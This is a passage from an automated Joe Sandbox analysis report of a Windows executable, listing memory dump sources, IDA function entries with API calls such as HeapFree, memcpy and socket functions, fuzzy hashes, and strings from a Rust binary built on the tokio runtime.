                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: assertion failed: !prev.is_complete()$assertion failed: prev.is_running()
                                            • API String ID: 3298025750-900065180
                                            • Opcode ID: 623402402ab5c315f847e893afa5efeb5537a4d70d1a8f956519890eb864c6bd
                                            • Instruction ID: b2792f4f2075c646b011fc9ade1239b9b6834d0c0b03d3d3605f3795bccee7ff
                                            • Opcode Fuzzy Hash: 623402402ab5c315f847e893afa5efeb5537a4d70d1a8f956519890eb864c6bd
                                            • Instruction Fuzzy Hash: 42518022A0DB4281EA60DF12E4E43AE63A0FF89794F4841B5DA8DA37A5DF3CE145C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: assertion failed: !prev.is_complete()$assertion failed: prev.is_running()
                                            • API String ID: 3298025750-900065180
                                            • Opcode ID: 30cc9eef521f05e8dfe9a0a3a2fcb64f78dba973d7452a78084f09098fdacd31
                                            • Instruction ID: 474c7bca64c189ad60421f64e1d2c5ac69ae76c7ae9cbc472ce957c6dbdc7f43
                                            • Opcode Fuzzy Hash: 30cc9eef521f05e8dfe9a0a3a2fcb64f78dba973d7452a78084f09098fdacd31
                                            • Instruction Fuzzy Hash: F9517522A0DB8281EB60DF12F4E43AA63A0FF85794F484175DA8DA37A9DF7CE145C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: assertion failed: !prev.is_complete()$assertion failed: prev.is_running()
                                            • API String ID: 3298025750-900065180
                                            • Opcode ID: 6503c8d54dc6c6cb1f8990d35dc7d6414935bab3ff354f7d55c741cc4c0dd12c
                                            • Instruction ID: 585e3c98f36f6c88216f48d7369c9d358c27de4511e7fd571ba9036766b4f27d
                                            • Opcode Fuzzy Hash: 6503c8d54dc6c6cb1f8990d35dc7d6414935bab3ff354f7d55c741cc4c0dd12c
                                            • Instruction Fuzzy Hash: 13516232A4DB4281EA60DF12E4E43AA73A4FF84794F4841B5DA8DA37A5DF7CE149C740
                                            APIs
                                            • CloseHandle.KERNEL32 ref: 00007FF65441C31D
                                            • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF65441C537
                                            • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF65441C56D
                                            • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF65441C5B6
                                              • Part of subcall function 00007FF65441C470: HeapFree.KERNEL32(?,?,?,00007FF65439B1AE,?,?,?,?,?,?,?,00007FF65439162E), ref: 00007FF65441C496
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$AddressCloseHandleSingleWake
                                            • String ID:
                                            • API String ID: 2385449635-0
                                            • Opcode ID: d5dfbf9172ff7f6399792bc2c2a146c19040f9dab90192eaf603705630bbb998
                                            • Instruction ID: b459fc2824f8e08fd5787428b22a4765ddd12542e21beb26ec88b67d9836a94e
                                            • Opcode Fuzzy Hash: d5dfbf9172ff7f6399792bc2c2a146c19040f9dab90192eaf603705630bbb998
                                            • Instruction Fuzzy Hash: 3741C823B4991281EA569B06AC9477D2770EF45BA0F8991B2CE1DA73D4CF38D493C340
                                            Strings
                                            • %00%01%02%03%04%05%06%07%08%09%0A%0B%0C%0D%0E%0F%10%11%12%13%14%15%16%17%18%19%1A%1B%1C%1D%1E%1F%20%21%22%23%24%25%26%27%28%29%2A%2B%2C%2D%2E%2F%30%31%32%33%34%35%36%37%38%39%3A%3B%3C%3D%3E%3F%40%41%42%43%44%45%46%47%48%49%4A%4B%4C%4D%4E%4F%50%51%52%53%54%55%5, xrefs: 00007FF65440C391, 00007FF65440C543
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: %00%01%02%03%04%05%06%07%08%09%0A%0B%0C%0D%0E%0F%10%11%12%13%14%15%16%17%18%19%1A%1B%1C%1D%1E%1F%20%21%22%23%24%25%26%27%28%29%2A%2B%2C%2D%2E%2F%30%31%32%33%34%35%36%37%38%39%3A%3B%3C%3D%3E%3F%40%41%42%43%44%45%46%47%48%49%4A%4B%4C%4D%4E%4F%50%51%52%53%54%55%5
                                            • API String ID: 3510742995-2957816097
                                            • Opcode ID: d59a1c47bce980c116953e649934fd8f0e20c9da715aa24557df8be09587b6c1
                                            • Instruction ID: 4c35128fb7054a77be9a74ba9dbdf319ae877dd9668c89393455add889c5f190
                                            • Opcode Fuzzy Hash: d59a1c47bce980c116953e649934fd8f0e20c9da715aa24557df8be09587b6c1
                                            • Instruction Fuzzy Hash: EF31E861B5DA5281EA18DB02A4A457A67F1FF55FC0F4C4474EE4EABB9DDE3CE1108300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: assertion failed: curr.is_join_interested()$assertion failed: prev.ref_count() >= 1
                                            • API String ID: 3298025750-3253692217
                                            • Opcode ID: 4a14f0ea96ecc536990b7f83574289e2b87f19108fc65c21942f7b4280faa385
                                            • Instruction ID: cb4bb8f9bb23acb730ae2103c9ce4967ffd89b543c4da72fd1e602596d3b22b5
                                            • Opcode Fuzzy Hash: 4a14f0ea96ecc536990b7f83574289e2b87f19108fc65c21942f7b4280faa385
                                            • Instruction Fuzzy Hash: 7531B221E0CA4380EA11DF16E8A53FD1350AF86BB4F4C42B5DD2EA77E5DE2C95468340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: assertion failed: curr.is_join_interested()$assertion failed: prev.ref_count() >= 1
                                            • API String ID: 3298025750-3253692217
                                            • Opcode ID: 009127c43afb1dd8ea712f60a9501b78c38ca39983c640b821d3bc396f71d756
                                            • Instruction ID: 68dfea4da3b74801c72c8dacf01b4a68a8c41b9ffffebc10df8d73c9e57db19a
                                            • Opcode Fuzzy Hash: 009127c43afb1dd8ea712f60a9501b78c38ca39983c640b821d3bc396f71d756
                                            • Instruction Fuzzy Hash: 9D31C511E09A4380EA11DF16E4A23FD1351AF86BB4F4C42B6DE2EE77E1DF2C90468340
                                            APIs
                                            Strings
                                            • assertion failed: prev.ref_count() >= 1, xrefs: 00007FF65439E7EF
                                            • assertion failed: self.ref_count() > 0, xrefs: 00007FF65439E794
                                            • assertion failed: next.is_notified()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\runtime\task\state.rs, xrefs: 00007FF65439E77C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: assertion failed: next.is_notified()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\runtime\task\state.rs$assertion failed: prev.ref_count() >= 1$assertion failed: self.ref_count() > 0
                                            • API String ID: 3298025750-1647977596
                                            • Opcode ID: ea67ef326232b569d59456048409085f227d2517ba4cab4cf793556a21bb894c
                                            • Instruction ID: 8e11bd48aa85e46563fb51637aee79c2c4ae3ac3d3efbb3e6e750d0db3750c62
                                            • Opcode Fuzzy Hash: ea67ef326232b569d59456048409085f227d2517ba4cab4cf793556a21bb894c
                                            • Instruction Fuzzy Hash: F7319021A08A4290FA20DB16D8F13F96360EF88794F584176D95DE27F6EF3DE14AD341
                                            APIs
                                            Strings
                                            • assertion failed: prev.ref_count() >= 1, xrefs: 00007FF65439F0E2
                                            • assertion failed: self.ref_count() > 0, xrefs: 00007FF65439F087
                                            • assertion failed: next.is_notified()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\runtime\task\state.rs, xrefs: 00007FF65439F06F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: assertion failed: next.is_notified()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\runtime\task\state.rs$assertion failed: prev.ref_count() >= 1$assertion failed: self.ref_count() > 0
                                            • API String ID: 3298025750-1647977596
                                            • Opcode ID: 755f61aa39b0a21a10969b33040af8253f716072d238e38458fb13e64dfe2741
                                            • Instruction ID: 6697eb4c1d78a94d4c8bb45dd3ccbb3026874f8b0413de9f6e6dda84469af72f
                                            • Opcode Fuzzy Hash: 755f61aa39b0a21a10969b33040af8253f716072d238e38458fb13e64dfe2741
                                            • Instruction Fuzzy Hash: C9319321A08A4294FA20DB12D4F13F96360EF89794F584176DA5DE27F6EF2DE146D340
                                            APIs
                                            Strings
                                            • assertion failed: prev.ref_count() >= 1, xrefs: 00007FF65439EC5A
                                            • assertion failed: self.ref_count() > 0, xrefs: 00007FF65439EBFF
                                            • assertion failed: next.is_notified()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\runtime\task\state.rs, xrefs: 00007FF65439EBE7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: assertion failed: next.is_notified()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\runtime\task\state.rs$assertion failed: prev.ref_count() >= 1$assertion failed: self.ref_count() > 0
                                            • API String ID: 3298025750-1647977596
                                            • Opcode ID: 1adaa37b7fdc2ead5cff95d917b04125f5cf644133f0b3857b831118a717beb9
                                            • Instruction ID: b9df74bbfda28c70e9973afc83517a2d237f6f6b1553cdd5e2a0a62bcad39153
                                            • Opcode Fuzzy Hash: 1adaa37b7fdc2ead5cff95d917b04125f5cf644133f0b3857b831118a717beb9
                                            • Instruction Fuzzy Hash: 29318121A0CA4290FA20DB12E8E13F96360EF89794F584176DA5DA77F6DF3DE14AD340
                                            APIs
                                            Strings
                                            • assertion failed: prev.ref_count() >= 1, xrefs: 00007FF65439E389
                                            • assertion failed: self.ref_count() > 0, xrefs: 00007FF65439E32E
                                            • assertion failed: next.is_notified()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\runtime\task\state.rs, xrefs: 00007FF65439E316
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: assertion failed: next.is_notified()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\runtime\task\state.rs$assertion failed: prev.ref_count() >= 1$assertion failed: self.ref_count() > 0
                                            • API String ID: 3298025750-1647977596
                                            • Opcode ID: 97fe16b043d33879e533e4539828374afcf9bed49d2c2b3411a0ff5c69bd3b3e
                                            • Instruction ID: a5b08df8a5818e3dddecea7652da89869cf90e9dec4c49d7a0c16d1a97225058
                                            • Opcode Fuzzy Hash: 97fe16b043d33879e533e4539828374afcf9bed49d2c2b3411a0ff5c69bd3b3e
                                            • Instruction Fuzzy Hash: 1431A525A08A4290FA20DB12E8E13F96360EF89B94F584175DA5DE77F5DF3DE04AD300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: ErrorLastclosesocketioctlsocketsocket
                                            • String ID:
                                            • API String ID: 2271902195-0
                                            • Opcode ID: 4f49bb275c728f2888ffdb8b04dec3563471adb6226612edb4e678073411b85a
                                            • Instruction ID: f7303fecb2de5ba4cded54e7089f6d494df209ad3d4a1fd2631726eff00df4c0
                                            • Opcode Fuzzy Hash: 4f49bb275c728f2888ffdb8b04dec3563471adb6226612edb4e678073411b85a
                                            • Instruction Fuzzy Hash: 83315E31508AC286E6359B26E4913EAA3A0FF98744F084275DADEA37E6DF7CE444D700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: LayoutError$called `Result::unwrap()` on an `Err` value
                                            • API String ID: 3298025750-1963632907
                                            • Opcode ID: cd8267aebcc3ee0c93ed57bd8e9c7875fb06b65865a4b064086ed7d32f4dba76
                                            • Instruction ID: 8dbc08bd18c054627c9c17a5afc58f833ac82a1ee470a9511410d26bf3f1aa5d
                                            • Opcode Fuzzy Hash: cd8267aebcc3ee0c93ed57bd8e9c7875fb06b65865a4b064086ed7d32f4dba76
                                            • Instruction Fuzzy Hash: 4231A265E08A5681FA10DB16E8E03F92360EF85B94F4842B6D95DA3BF5DF3CE586C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: abort$CaptureContextExceptionRaiseUnwind
                                            • String ID:
                                            • API String ID: 4122134289-0
                                            • Opcode ID: 2bcff824be30459135a71c998de276fed3506b8ea1736bf103fc81263e5dcddb
                                            • Instruction ID: 9203bb364998eafd24128c8308fa93830ec8ef45cb43c414443c94a482e70c98
                                            • Opcode Fuzzy Hash: 2bcff824be30459135a71c998de276fed3506b8ea1736bf103fc81263e5dcddb
                                            • Instruction Fuzzy Hash: 53118E32918A8982EB20DF21D8503A9B3B1FB88BC4F185235EA8D63659CF78D195CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$AddressSingleWake
                                            • String ID: StreamRef::drop; mutex poisoned$assertion failed: self.ref_count > 0
                                            • API String ID: 974827444-2794084937
                                            • Opcode ID: 1dd01fffd9e395c80178e4c4c4337f76bd041f4ccd143692ad4efbc9e8c2ce2c
                                            • Instruction ID: cf7d110ddb0999fafe696d9c9ff2da842339fb8f3ffe3f6572518aac19e0bc23
                                            • Opcode Fuzzy Hash: 1dd01fffd9e395c80178e4c4c4337f76bd041f4ccd143692ad4efbc9e8c2ce2c
                                            • Instruction Fuzzy Hash: 8122D432A0978186EB64DF16E1A03AAB3A1FB84794F5C4175DB9E937A4DF3CE445CB00
                                            APIs
